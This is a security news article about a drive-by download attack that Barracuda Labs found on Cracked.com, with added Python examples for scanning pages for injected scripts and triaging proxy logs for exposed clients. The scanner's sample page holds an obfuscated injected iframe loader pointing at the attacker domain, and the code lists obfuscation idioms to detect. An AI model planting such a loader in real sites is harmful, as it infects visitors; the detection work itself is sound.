If you've visited the popular humor website Cracked.com over the last few days, you may have been hit by a drive-by download attack, according to researchers at Barracuda Labs. Scan your computer right away!
A researcher discovered on Nov. 10 that Cracked.com was hosting a drive-by download which delivered malware to site visitors with vulnerable systems, Barracuda Networks researchers Daniel Peck and Paul Royal wrote on the Barracuda Labs blog. It appears the attackers may have had access to the site as early as Nov. 4.
A drive-by download occurs when malicious code on a Web page targets vulnerabilities in the software running on a user's computer, typically the browser and the plugins it loads, such as a PDF reader or Java. Unlike other Web-based attacks, which require a user to click on a link or open a file, a drive-by can download malware or execute commands without any user action. The user is infected just by visiting the page.
A site administrator on Cracked.com posted to the user forums indicating the problem has been resolved as of Tuesday evening. "Yeah we stopped getting complaints about it and Google took us off the malware warning list or whatever was triggering it. Is anybody else getting it again?"
Barracuda's Peck confirmed to SecurityWatch that the site was not currently compromised, but said that after looking into past issues with Cracked.com, these kinds of attacks "appear to be a recurring problem for them."
Details of the Attack
In this case, malicious JavaScript code on Cracked.com requested a malicious page from a different site owned by the attackers, crackedcdm.com. That attack page used "a blend of malicious PDF, Java, and HTML/JavaScript files" to try to compromise the browser and its plugins. Once one of those exploits succeeded, the malware downloaded and installed itself. At the time of publication, 24 of the 47 antivirus engines on VirusTotal detected the malware.
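Here is an added example, not code from Barracuda Labs or from Cracked.com, of how a site operator or analyst could check a fetched page for the kind of injection described above: external script tags that point at hosts other than the site's own, ranked by how closely the foreign hostname imitates a legitimate one, plus inline scripts built with the obfuscation idioms exploit-kit loaders tend to use. The allowlist of legitimate hosts, the sample HTML, the list of idioms and the edit-distance threshold are assumptions for the example; the only hostname taken from the report is crackedcdm.com.

```python
import re
from urllib.parse import urlparse

# Hosts the site legitimately loads script from. This allowlist is an
# assumption for the example; a real deployment builds it from the site's
# known asset hosts.
ALLOWED_HOSTS = {"cracked.com", "www.cracked.com"}

# src attribute of <script> tags: double-quoted, single-quoted or bare.
SCRIPT_SRC_RE = re.compile(
    r"<script\b[^>]*?\bsrc\s*=\s*(?:\"([^\"]*)\"|'([^']*)'|([^\s>]+))",
    re.IGNORECASE,
)
INLINE_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.IGNORECASE | re.DOTALL)
# Idioms injected loaders lean on to hide the iframe or script they write.
OBFUSCATION_HINTS = ("fromCharCode", "unescape(", "eval(", "document.write(")

# Constructed page: two legitimate scripts, one injected loader pointing at
# the host named in the report, and one obfuscated inline script.
SAMPLE_HTML = """<html><head>
<script src="/static/app.js"></script>
<script src="https://www.cracked.com/js/site.js"></script>
<script type="text/javascript" src='//crackedcdm.com/loader.js'></script>
</head><body><p>article body</p>
<script>var s=unescape("%3Ciframe%20src%3D%22http%3A//crackedcdm.com/x.php%22%3E");document.write(s);</script>
</body></html>"""


def levenshtein(a, b):
    """Edit distance between two strings; small values flag lookalike hostnames."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def script_hosts(html, page_host):
    """Yield (src, host) for each <script src>; relative paths belong to page_host."""
    for m in SCRIPT_SRC_RE.finditer(html):
        src = next(g for g in m.groups() if g is not None)
        if src.startswith("//"):          # protocol-relative URL
            host = urlparse("http:" + src).hostname
        elif "://" in src:                # absolute URL
            host = urlparse(src).hostname
        else:                             # relative path, same host as the page
            host = page_host
        if host:
            yield src, host.lower()


def find_suspicious(html, page_host="www.cracked.com", allowed=ALLOWED_HOSTS, max_distance=3):
    """Return findings for scripts loaded from hosts outside the allowlist and
    for inline scripts that show obfuscation idioms."""
    findings = []
    for src, host in script_hosts(html, page_host):
        if host in allowed:
            continue
        closest = min(allowed, key=lambda h: levenshtein(host, h))
        dist = levenshtein(host, closest)
        if dist <= max_distance:
            reason = "lookalike of %s (edit distance %d)" % (closest, dist)
        else:
            reason = "unlisted external host"
        findings.append({"src": src, "host": host, "reason": reason})
    for body in INLINE_RE.findall(html):
        hits = [h for h in OBFUSCATION_HINTS if h in body]
        if hits:
            findings.append({"src": "<inline>", "host": None,
                             "reason": "obfuscation idioms: " + ", ".join(hits)})
    return findings


if __name__ == "__main__":
    for f in find_suspicious(SAMPLE_HTML):
        print("%-16s %-36s %s" % (f["host"], f["src"], f["reason"]))
```

Run against the constructed page, the script flags crackedcdm.com as a lookalike of cracked.com (three edits away) and the inline script for its unescape/document.write pair, while the two legitimate script tags pass. A host far from every allowlisted name is still reported, just as "unlisted external host", so the allowlist has to include any third-party CDN the site genuinely uses.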
The only indication a user gets that something may be wrong is that the Java plugin launches and a message appears saying the system is low on memory.
Barracuda Labs warns that "thousands of visitors" may have been exposed to the attack. Statistics collected by Alexa rank Cracked.com as the 289th most popular site in the United States, and 654th in the world.
Peck said that initial findings indicate the attackers were using techniques and exploits similar to what is found in the Nuclear Exploit Pack. Many of the antivirus vendors also appear to be detecting the malware as part of the Androm botnet, he noted.
Trusted Site
If you visited Cracked.com in the past 10 days, update your antivirus signatures and scan your machines right away. It appears several of the major antivirus suites, including Kaspersky Lab, F-Secure, Trend Micro, Symantec, McAfee, and BitDefender, updated their signatures today to detect this malware, according to VirusTotal.
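For an organization rather than a single user, the practical version of "scan your machines" is to pull the exposed hosts out of the Web proxy logs. The following is an added example, not from Barracuda Labs, that does this over a constructed log: any client that fetched Cracked.com inside the exposure window is listed, clients that also reached crackedcdm.com rank higher, and clients that pulled a Java or PDF object from it rank highest. The log format, the IP addresses, the end of the window and the year, and the set of payload content types are assumptions for the example; Nov. 4 as the start of the window and the two hostnames come from the report.

```python
import csv
from datetime import datetime

# Hostnames taken from the Barracuda Labs write-up.
SITE_HOSTS = {"cracked.com", "www.cracked.com"}
EXPLOIT_HOST = "crackedcdm.com"
# Content types matching the "PDF, Java" objects the exploit page served.
# The set is an assumption; extend it to what your proxy actually logs.
PAYLOAD_TYPES = {"application/pdf", "application/java-archive",
                 "application/x-java-archive", "application/octet-stream"}

# Exposure window. Nov. 4 is the earliest access date in the report; the
# end date and the year are assumptions for the example.
WINDOW_START = datetime(2013, 11, 4)
WINDOW_END = datetime(2013, 11, 14)

# Constructed proxy log, one request per line:
# timestamp,client_ip,host,path,status,content_type
SAMPLE_LOG = """\
2013-11-02T18:40:11,10.0.0.9,www.cracked.com,/article/99,200,text/html
2013-11-05T09:12:01,10.0.0.5,www.cracked.com,/article/123,200,text/html
2013-11-05T09:12:02,10.0.0.5,crackedcdm.com,/loader.php,200,text/html
2013-11-05T09:12:04,10.0.0.5,crackedcdm.com,/x.jar,200,application/java-archive
2013-11-06T10:01:00,10.0.0.7,www.cracked.com,/article/124,200,text/html
2013-11-06T10:01:01,10.0.0.7,cdn.example.net,/jquery.js,200,application/javascript
2013-11-08T14:22:37,10.0.0.12,cracked.com,/,200,text/html
2013-11-08T14:22:38,10.0.0.12,crackedcdm.com,/loader.php,404,text/html
2013-11-09T11:00:00,10.0.0.11,example.org,/,200,text/html
"""


def exposed_clients(lines, start=WINDOW_START, end=WINDOW_END):
    """Map client IP -> triage priority for clients seen inside the window.

    low:    fetched Cracked.com (the injected script ran if the site was
            serving it at that moment; scan the machine)
    medium: also contacted crackedcdm.com (the exploit page was requested)
    high:   pulled a Java/PDF object from crackedcdm.com (an exploit was
            delivered; treat as compromised until proven otherwise)
    """
    seen = {}
    for row in csv.reader(l for l in lines if l.strip()):
        ts = datetime.fromisoformat(row[0])
        if not (start <= ts < end):
            continue
        client, host, ctype = row[1], row[2].lower(), row[5].lower()
        rec = seen.setdefault(client, {"visited": False, "exploit_host": False, "payloads": []})
        if host in SITE_HOSTS:
            rec["visited"] = True
        elif host == EXPLOIT_HOST:
            # Any contact counts, even a 404: the client ran the injected script.
            rec["exploit_host"] = True
            if ctype in PAYLOAD_TYPES:
                rec["payloads"].append(row[3])
    result = {}
    for client, rec in seen.items():
        if rec["payloads"]:
            result[client] = "high"
        elif rec["exploit_host"]:
            result[client] = "medium"
        elif rec["visited"]:
            result[client] = "low"
    return result


if __name__ == "__main__":
    order = {"high": 0, "medium": 1, "low": 2}
    for client, prio in sorted(exposed_clients(SAMPLE_LOG.splitlines()).items(),
                               key=lambda kv: order[kv[1]]):
        print(prio, client)
```

On the constructed log this yields one high-priority host (it fetched a .jar from the exploit domain), one medium (it reached the exploit domain but got a 404) and one low (it only read the site). The client that visited on Nov. 2, before the earliest known compromise date, and the client that never touched either domain are not listed. A client that reaches crackedcdm.com with no logged Cracked.com visit, for instance because the page came from a cache, is still ranked, which is why the exploit host is checked on its own rather than only as a follow-on to a site visit.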
Also make sure you are staying on top of updates for commonly targeted software, such as Adobe Reader, Java, and your Web browser, since drive-by downloads depend on your having unpatched software. Many Web browsers, such as Google Chrome, also display big red warning screens when malware has been detected on a site. If you are receiving a malware warning from your security software or browser, take it seriously and don't access the site. That funny article will keep.
It appears from looking at the Cracked.com forum postings that many people saw the warning and clicked the "Proceed" button anyway to get to the site. Don't do that!
The fact that Cracked.com doesn't proactively alert site visitors about these incidents, or provide remediation steps to clean up the systems "tends to indicate that Cracked.com should be avoided if you're concerned with malware," Barracuda Labs concluded in its post.